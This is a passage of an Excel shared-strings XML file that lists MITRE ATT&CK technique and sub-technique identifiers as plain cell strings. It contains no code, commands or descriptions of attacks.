    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1587.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1587.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1587.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1561</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1561.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1561.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1484</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1484.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1484.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1568</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1568.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1568.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1568.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1114</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1114.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1114.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1114.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1573</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1573.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1573.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1499</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1499.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1499.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1499.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1499.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1585</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1585.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1585.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1546.015</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1480</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1480.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1048</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1048.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1048.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1048.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1011.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1052</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1052.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1567</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1567.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1567.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1222</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1222.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1222.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1606</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1606.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1606.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1592</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1592.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1592.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1592.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1592.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1589</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1589.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1589.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1589.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1590.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1591</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1591.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1591.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1591.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1591.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1564.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1574.012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1562.01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1070.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1056</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1056.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1056.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1056.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1056.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1559</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1559.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1559.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1036.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1556</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1556.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1556.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1556.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1556.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1578</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1578.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1578.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1578.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1578.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1601</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1601.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1601.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1599</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1599.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1498</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1498.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1498.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1027.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1588.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1137.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1003.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1069</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1069.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1069.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1069.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1566</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1566.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1566.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1566.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1598</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1598.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1598.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1598.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1542.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1055.014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1090</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1090.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1090.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1090.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1090.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1563</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1563.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1563.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1021.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1053.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1597</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1597.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1597.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1596.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1593</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1593.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1593.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1505</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1505.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1505.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1505.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1505.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.008</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.009</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.01</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.011</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.012</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.013</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1218.014</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1216</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1216.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1518</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1518.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1608.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1558</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1558.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1558.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1558.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1558.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1553.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1195</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1195.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1195.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1195.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1614</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1614.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1016</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1016.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1569</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1569.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1569.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1205</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1205.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1127</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1127.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.005</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.006</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1552.007</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1550</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1550.001</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1550.002</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1550.003</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
    <t>T1550.004</t>
    <phoneticPr fontId="1" type="noConversion"/>
  </si>
  <si>
